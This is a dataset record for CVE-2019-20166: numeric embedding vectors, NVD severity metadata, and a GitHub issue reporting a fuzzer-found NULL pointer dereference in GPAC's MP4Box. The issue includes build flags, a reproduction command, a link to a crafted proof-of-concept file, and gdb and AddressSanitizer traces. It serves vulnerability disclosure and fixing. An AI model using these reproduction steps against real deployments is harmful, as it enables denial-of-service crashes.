-0.017951587215065956, 0.0035996672231703997, 0.021250726655125618, -0.013550509698688984, 0.00016560389485675842, -0.020075324922800064, 0.017617667093873024, 0.00818106159567833, 0.0030587154906243086, 0.009516745805740356, -0.00009563702769810334, -0.007600039709359407, 0.002636305522173643, 0.0037766452878713608, 0.026112614199519157, 0.01598813198506832, -0.022813474759459496, -0.0002800761430989951, -0.001991838216781616, -0.0027281336952000856, 0.03395307809114456, 0.018272152170538902, 0.02520434930920601, 0.009122719056904316, 0.0188197810202837, -0.0056265671737492085, -0.011006033048033714, 0.007466471288353205, 0.005566461477428675, 0.0012204808881506324, 0.0048819235526025295, -0.027675364166498184, -0.0013532143784686923, -0.00899582915008068, 0.005950470454990864, 0.03929581120610237, 0.0017163533484563231, 0.038521114736795425, -0.009910772554576397, -0.004835174418985844, -0.0022122259251773357, -0.0012188112596049905, -0.015827849507331848, 0.002102032070979476, 0.02370838262140751, -0.01856600120663643, 0.0207698792219162, 0.0142383873462677, 0.0029568695463240147, -0.008454876951873302, -0.00024063175078481436, 0.01565421186387539, 0.016963182017207146, -0.014652448706328869, -0.015667568892240524, -0.01568092592060566, 0.0200886819511652, -0.0004591412434820086, -0.003183935768902302, 0.008000744506716728, -0.005326038226485252, -0.013196554034948349, 0.00874204933643341, -0.004748355131596327, -0.009096005000174046, 0.029812457039952278, -0.00733958138152957, -0.010077732615172863, -0.0032139886170625687, 0.00947667472064495, -0.008174383081495762, 0.008508304134011269, 0.019981825724244118, -0.0018098512664437294, -0.0036030064802616835, -0.018552644178271294, 0.016963182017207146, 0.02576533704996109, -0.014759304001927376, -0.004294222686439753, 0.015921348705887794, 0.016255268827080727, 0.004220759961754084, 0.0104517238214612, 0.0014817739138379693, 0.025952331721782684, -0.01497301273047924, -0.0032407022081315517, 0.022185703739523888, 0.015921348705887794, 0.011814121156930923, -0.0122215049341321, -0.016295339912176132, -0.0018382344860583544, -0.004871905781328678, -0.014131532050669193, -0.004447826184332371, -0.0007054078741930425, 0.010104446671903133, -0.0243495125323534, -0.0072527616284787655, -0.004130601417273283, 0.004811800085008144, 0.010364904999732971, 0.010585292242467403, -0.011079494841396809, -0.0047082845121622086, 0.0000873411845532246, -0.01359058078378439, 0.009563494473695755, -0.028530200943350792, -0.003073741914704442, -0.00021558767184615135, 0.0030637241434305906, -0.02051609940826893, 0.01544050220400095, -0.01398460753262043, 0.02105037309229374, 0.0028066050726920366, -0.021851783618330956, 0.00650477921590209, -0.0021871819626539946, -0.0015168356476351619, 0.011152957566082478, 0.004274187609553337, 0.0015193400904536247, 0.01717689074575901, -0.008508304134011269, 0.008334665559232235, 0.01421167328953743, 6.52189235950118e-9, 0.00497208209708333, 0.003983676433563232, 0.01712346263229847, 0.022199060767889023, 0.017924873158335686, 0.007259440142661333, -0.008708656765520573, 0.001868287450633943, 0.009596886113286018, 0.00980391725897789, 0.0057534570805728436, 0.001312309061177075, -0.008127634413540363, -0.009556815959513187, -0.007473149802535772, -0.0004073834861628711, -0.007506541907787323, -0.028182923793792725, -0.015293576754629612, -0.019447552040219307, -0.0014041373506188393, 0.019848257303237915, 0.0029551999177783728, -0.007319545838981867, -0.010598649270832539, -0.009443283081054688, 0.029011046513915062, -0.00892904493957758, 0.014839444309473038, 0.0013465359807014465, 0.01113292295485735, -0.013203232549130917, -0.005406179465353489, 0.014118175022304058, -0.0062409816309809685, -0.011740658432245255, 0.021544575691223145, 0.015266863629221916, -0.0014016329078003764, 0.020462673157453537, -0.011139601469039917, 0.0014007982099428773, 0.02133086696267128, 0.006344497203826904, 0.023187467828392982, 0.041913751512765884, -0.016829613596200943, -0.004033764358609915, 0.003596327966079116, 0.00025064937653951347, 0.01128652598708868, -0.005456267390400171, -0.011513592675328255, -0.038414258509874344, -0.010859107598662376, 0.018512574955821037, 0.02432279847562313, 0.0007312867674045265, -0.0063812281005084515, -0.002023560693487525, 0.013203232549130917, 0.02376181073486805, 0.028156209737062454, 0.007152585778385401, -0.006972268223762512, 0.001384936855174601, 0.007686858996748924, -0.002210556296631694, 0.02700752206146717, 0.006998981814831495, 0.003355904947966337, -0.0013966241385787725, -0.004174011293798685, -0.004371024668216705, 0.016575833782553673, -0.013523796573281288, 0.002030238974839449, -0.017871446907520294, 0.002517763525247574, 0.02189185470342636, 0.005633245687931776, -0.009256287477910519, 0.003930248785763979, 0.010418332181870937, 0.0027298033237457275, 0.02237270027399063, 0.029759030789136887, -0.005516373086720705, 0.02036917395889759, -0.012675637379288673, -0.009964199736714363, -0.006090716924518347, -0.0033993148244917393, -0.005215844605118036, -0.005873668473213911, 0.010905856266617775, -0.014705875888466835, 0.006564884912222624, -0.01258881762623787, -0.012949452735483646, -0.006271034479141235, 0.024616647511720657, 0.020208893343806267, 0.034540776163339615, 0.008187740109860897, -0.0023023844696581364, 0.021958637982606888, 0.007566647604107857 ]
185
CVE-2019-20166
2019-12-31T00:15:12.837000
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function gf_isom_dump() in isomedia/box_dump.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1331" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1331
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_dump ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_dump gdb info: ```C Error in bin/MP4Box: free(): invalid next size (fast): 0x00000000009cc600 ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff73447e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7ffff734d37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7ffff735153c] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff72ed830] ======= Memory map: ======== 009c8000-009ec000 rw-p 00000000 00:00 0 [heap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 7ffff70b7000-7ffff70cd000 r-xp 00000000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff70cd000-7ffff72cc000 ---p 00016000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cc000-7ffff72cd000 rw-p 00015000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cd000-7ffff748d000 r-xp 00000000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff748d000-7ffff768d000 ---p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff768d000-7ffff7691000 r--p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7691000-7ffff7693000 rw-p 001c4000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7693000-7ffff7697000 rw-p 00000000 00:00 0 7ffff7697000-7ffff76b0000 r-xp 00000000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff76b0000-7ffff78af000 ---p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78af000-7ffff78b0000 r--p 00018000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b0000-7ffff78b1000 rw-p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b1000-7ffff79b9000 r-xp 00000000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff79b9000-7ffff7bb8000 ---p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb8000-7ffff7bb9000 r--p 00107000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb9000-7ffff7bba000 rw-p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bba000-7ffff7bd2000 r-xp 00000000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7bd2000-7ffff7dd1000 ---p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd1000-7ffff7dd2000 r--p 00017000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd2000-7ffff7dd3000 rw-p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fdf000-7ffff7fe4000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff730402a in __GI_abort () at abort.c:89 #2 0x00007ffff73447ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff745ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff734d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff745df50 "free(): invalid next size (fast)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff735153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x0000000000512a7d in gf_isom_box_del () #7 0x0000000000513eae in gf_isom_parse_root_box () #8 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #9 0x000000000051c48c in gf_isom_open_file () #10 0x000000000041c082 in mp4boxMain () #11 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:291 #12 0x000000000040eba9 in _start () ``` ASAN info: ```C [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [iso file] Box "tenc" (start 8) has 389 extra bytes [iso file] Unknown top-level box type ffff [iso file] Incomplete box ffff - start 532 size 1717986903 [iso file] Incomplete file while reading for dump - aborting parsing  ASAN:SIGSEGV ================================================================= ==26000==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006a3968 bp 0x61600000ea80 sp 0x7fffffff8080 T0) #0 0x6a3967 in gf_isom_dump isomedia/box_dump.c:133 #1 0x443b9a in dump_isom_xml /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/filedump.c:1930 #2 0x43246d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4982 #3 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_dump.c:133 gf_isom_dump ==26000==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: NULL pointer dereference in gf_isom_dump isomedia/box_dump.c:133
https://api.github.com/repos/gpac/gpac/issues/1331/comments
2
2019-11-09T11:18:44
2020-01-08T12:44:45Z
https://github.com/gpac/gpac/issues/1331
520,394,250
1,331
true
This is a GitHub Issue repo:gpac owner:gpac Title : AddressSanitizer: NULL pointer dereference in gf_isom_dump isomedia/box_dump.c:133 Issue date: --- start body --- System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_dump ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_dump gdb info: ```C Error in bin/MP4Box: free(): invalid next size (fast): 0x00000000009cc600 ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff73447e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7ffff734d37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7ffff735153c] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff72ed830] ======= Memory map: ======== 009c8000-009ec000 rw-p 00000000 00:00 0 [heap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 7ffff70b7000-7ffff70cd000 r-xp 00000000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff70cd000-7ffff72cc000 ---p 00016000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cc000-7ffff72cd000 rw-p 00015000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cd000-7ffff748d000 r-xp 00000000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff748d000-7ffff768d000 ---p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff768d000-7ffff7691000 r--p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7691000-7ffff7693000 rw-p 001c4000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7693000-7ffff7697000 rw-p 00000000 00:00 0 7ffff7697000-7ffff76b0000 r-xp 00000000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff76b0000-7ffff78af000 ---p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78af000-7ffff78b0000 r--p 00018000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b0000-7ffff78b1000 rw-p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b1000-7ffff79b9000 r-xp 00000000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff79b9000-7ffff7bb8000 ---p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb8000-7ffff7bb9000 r--p 00107000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb9000-7ffff7bba000 rw-p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bba000-7ffff7bd2000 r-xp 00000000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7bd2000-7ffff7dd1000 ---p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd1000-7ffff7dd2000 r--p 00017000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd2000-7ffff7dd3000 rw-p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fdf000-7ffff7fe4000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff730402a in __GI_abort () at abort.c:89 #2 0x00007ffff73447ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff745ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff734d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff745df50 "free(): invalid next size (fast)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff735153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x0000000000512a7d in gf_isom_box_del () #7 0x0000000000513eae in gf_isom_parse_root_box () #8 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #9 0x000000000051c48c in gf_isom_open_file () #10 0x000000000041c082 in mp4boxMain () #11 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:291 #12 0x000000000040eba9 in _start () ``` ASAN info: ```C [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [iso file] Box "tenc" (start 8) has 389 extra bytes [iso file] Unknown top-level box type ffff [iso file] Incomplete box ffff - start 532 size 1717986903 [iso file] Incomplete file while reading for dump - aborting parsing  ASAN:SIGSEGV ================================================================= ==26000==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006a3968 bp 0x61600000ea80 sp 0x7fffffff8080 T0) #0 0x6a3967 in gf_isom_dump isomedia/box_dump.c:133 #1 0x443b9a in dump_isom_xml /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/filedump.c:1930 #2 0x43246d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4982 #3 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_dump.c:133 gf_isom_dump ==26000==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com) --- end body ---
7,096
[ -0.030236897990107536, 0.027448058128356934, -0.009451069869101048, 0.01947295479476452, 0.02028840407729149, 0.005390126723796129, -0.039369940757751465, 0.02452874556183815, -0.00002395385308773257, 0.0023729605600237846, -0.016700422391295433, 0.013724029064178467, 0.021348489448428154, -0.00901072658598423, -0.0022812222596257925, -0.0019214048516005278, -0.0293562114238739, 0.027562221512198448, 0.0023056857753545046, -0.01106566097587347, 0.03062831424176693, -0.018918447196483612, -0.01712445728480816, 0.04416479170322418, -0.015819735825061798, 0.023387115448713303, -0.012321454472839832, 0.018363941460847855, -0.0061321863904595375, 0.024675527587532997, -0.0063442038372159, 0.009426605887711048, -0.006124032195657492, 0.020614584907889366, 0.05515706166625023, 0.0011334759183228016, 0.048763930797576904, 0.07345576584339142, -0.011603858321905136, 0.025442050769925117, 0.030954495072364807, -0.041620586067438126, -0.01860857754945755, 0.033629171550273895, -0.011416304856538773, 0.018722739070653915, 0.0008332883007824421, -0.006621456705033779, -0.030563078820705414, 0.008904717862606049, 0.013642484322190285, -0.0002823496761266142, -0.0008694739080965519, -0.06614933162927628, 0.0132102956995368, -0.05443946272134781, 0.010413301177322865, 0.03162316232919693, 0.004244418814778328, 0.027448058128356934, 0.004643989726901054, -0.0004890153650194407, 0.006976177450269461, 0.015575101599097252, 0.023419734090566635, 0.020989691838622093, 0.006389053538441658, 0.012631325982511044, -0.019994841888546944, 0.0027011793572455645, -0.010755790397524834, -0.03379226103425026, 0.010992270894348621, 0.006686692591756582, 0.016602568328380585, -0.03689097240567207, 0.0312969833612442, 0.03255277872085571, -0.02416994795203209, 0.010584545321762562, -0.048405133187770844, 0.037836894392967224, -0.030497843399643898, 0.007534760981798172, -0.0030660931952297688, 0.02534419670701027, -0.049220580607652664, -0.07091156393289566, -0.013340767472982407, -0.03022058866918087, 0.02159312553703785, 0.004839697852730751, 0.010144202038645744, 0.0023301492910832167, 0.003031436586752534, 0.03219398111104965, -0.013748493045568466, -0.0001607966114534065, -0.05766864866018295, -0.0027521448209881783, -0.038684964179992676, -0.03238968923687935, 0.008439910598099232, 0.012533471919596195, -0.02141372673213482, 0.004085406195372343, 0.002996779978275299, -0.013291840441524982, 0.0234360434114933, 0.1458677500486374, 0.027709001675248146, 0.0032801490742713213, -0.004107831045985222, 0.009597850032150745, 0.010486691258847713, 0.0056306845508515835, 0.0010509116109460592, -0.0072208126075565815, -0.04269697889685631, -0.011342913843691349, -0.0034187755081802607, -0.013813728466629982, -0.020223168656229973, 0.025409432128071785, -0.0451759472489357, 0.06112615764141083, 0.00028107553953304887, -0.0003909064980689436, -0.014979822561144829, -0.014727032743394375, -0.03979397565126419, -0.034705568104982376, 0.022278103977441788, -0.014824886806309223, 0.0032984965946525335, -0.0023994625080376863, -0.03346608206629753, 0.028312435373663902, -0.002118132309988141, 0.024675527587532997, -0.0668669268488884, -0.022799991071224213, 0.03402058780193329, -0.004957938101142645, -0.038782816380262375, 0.0060751051642000675, 0.005912014748901129, 0.024593982845544815, -0.03194934502243996, -0.011489694938063622, -0.010698708705604076, -0.03786951303482056, 0.01901630125939846, 0.014384543523192406, 0.05903860554099083, 0.024691836908459663, 0.014833041466772556, 0.04047895595431328, -0.02958453819155693, -0.006857937201857567, -0.014449779875576496, -0.036662645637989044, 0.004701071418821812, -0.03193303570151329, -0.031329602003097534, -0.03062831424176693, 0.03379226103425026, 0.004741843789815903, 0.006894632708281279, 0.030791405588388443, 0.008912872523069382, 0.01633347012102604, 0.013846347108483315, 0.0411965511739254, -0.055711567401885986, -0.0007333956309594214, 0.017678963020443916, 0.03728238865733147, -0.006637765560299158, -0.001327145379036665, 0.005553216673433781, 0.006397207733243704, 0.0004757643037009984, 0.007942486554384232, 0.030644623562693596, -0.0012323493137955666, -0.010894416831433773, -0.039141617715358734, 0.008619310334324837, -0.018315015360713005, -0.0013597634388133883, -0.022522738203406334, 0.0019744092132896185, -0.006939482409507036, 0.07006349414587021, 0.006649997550994158, -0.023093553259968758, 0.009198280051350594, -0.029878100380301476, 0.011285833083093166, 0.018624885007739067, -0.006499139126390219, -0.010649781674146652, -0.00776716461405158, -0.004060942679643631, 0.004521672148257494, -0.027138186618685722, 0.042207710444927216, 0.02858968824148178, -0.00876609142869711, -0.008374675177037716, -0.03989183157682419, 0.008464374579489231, -0.0035145909059792757, -0.006083259359002113, 0.0022404498886317015, -0.020451493561267853, 0.021152781322598457, -0.013895274139940739, -0.011881111189723015, 0.021071236580610275, -0.003218990284949541, 0.009671241044998169, -0.034085825085639954, -0.014808578416705132, -0.040902987122535706, 0.007114804349839687, 0.0024810077156871557, -0.013357076793909073, -0.0018041838193312287, 0.02123432606458664, 0.010551927611231804, -0.00181539636105299, 0.014572097919881344, 0.014425316825509071, 0.014335616491734982, -0.009075962007045746, 0.0049620154313743114, -0.0069272504188120365, 0.013030895963311195, -0.015860509127378464, 0.039272088557481766, -0.015860509127378464, -0.00892102625221014, 0.007334975991398096, 0.05655963718891144, -0.015811581164598465, -0.05127551779150963, -0.0167167317122221, 0.032047197222709656, 0.02235964871942997, -0.03004118986427784, -0.017369091510772705, 0.0142540717497468, 0.00010021120397141203, 0.004778538830578327, 0.040544189512729645, 0.013039050623774529, -0.016879821196198463, -0.013756646774709225, 0.017744198441505432, 0.007041413802653551, -0.024381965398788452, 0.008684545755386353, -0.01334892213344574, 0.003647101577371359, -0.0055042896419763565, 0.022522738203406334, -0.008578537963330746, -0.012574244290590286, 0.04540427401661873, -0.012745488435029984, -0.03088925965130329, -0.038326166570186615, -0.02340342476963997, 0.00003688638753374107, -0.01911415532231331, 0.015460938215255737, 0.030106427147984505, 0.017222311347723007, 0.0007400211761705577, 0.02146265283226967, -0.009630468674004078, 0.025719303637742996, 0.01502059493213892, 0.000559602805878967, 0.009100425988435745, 0.011440767906606197, -0.027121877297759056, 0.011293986812233925, 0.013463085517287254, 0.02036994881927967, -0.06207207962870598, 0.034085825085639954, 0.022734755650162697, 0.021870378404855728, -0.005426821764558554, -0.004815234337002039, -0.016064371913671494, 0.013055359944701195, -0.013242913410067558, -0.0023831536527723074, -0.01185664813965559, 0.013626175001263618, -0.032503850758075714, 0.01307982299476862, -0.032324451953172684, 0.009801712818443775, -0.011481541208922863, 0.0019774669781327248, 0.02606179192662239, -0.06207207962870598, -0.03225921466946602, -0.008174889720976353, -0.04237079992890358, -0.024333037436008453, -0.011293986812233925, -0.02488754503428936, -0.015477247536182404, 0.02154419757425785, -0.0028214582707732916, 0.004815234337002039, -0.01883690245449543, 0.008570383302867413, 0.02682831697165966, -0.010657936334609985, -0.03026951663196087, 0.034444622695446014, -0.06751928478479385, 0.007697851397097111, 0.020516730844974518, -0.018755357712507248, 0.018217161297798157, -0.02909526787698269, -0.0018439370905980468, -0.03450985997915268, -0.015102140605449677, 0.013185831718146801, 0.012549780309200287, 0.013381539843976498, 0.001818454242311418, 0.013715874403715134, 0.02994333580136299, -0.0013026818633079529, -0.033400844782590866, -0.006580684334039688, 0.020223168656229973, -0.014099135994911194, -0.0017919520614668727, 0.009230897761881351, 0.0016737118130549788, 0.033987969160079956, -0.016064371913671494, 0.01914677396416664, 0.008521456271409988, 0.0018225314561277628, 0.0006289160810410976, -0.025148488581180573, 0.012142055667936802, -0.010731326416134834, -0.005112873390316963, -0.02050042152404785, -0.009483687579631805, 0.00641351705417037, -0.015232612378895283, 0.01978282444179058, 0.009279824793338776, -0.007302357815206051, -0.01807037927210331, -0.013332612812519073, -0.023387115448713303, 0.049481526017189026, -0.04638281464576721, 0.03225921466946602, -0.012957505881786346, -0.029013723134994507, 0.04083775356411934, 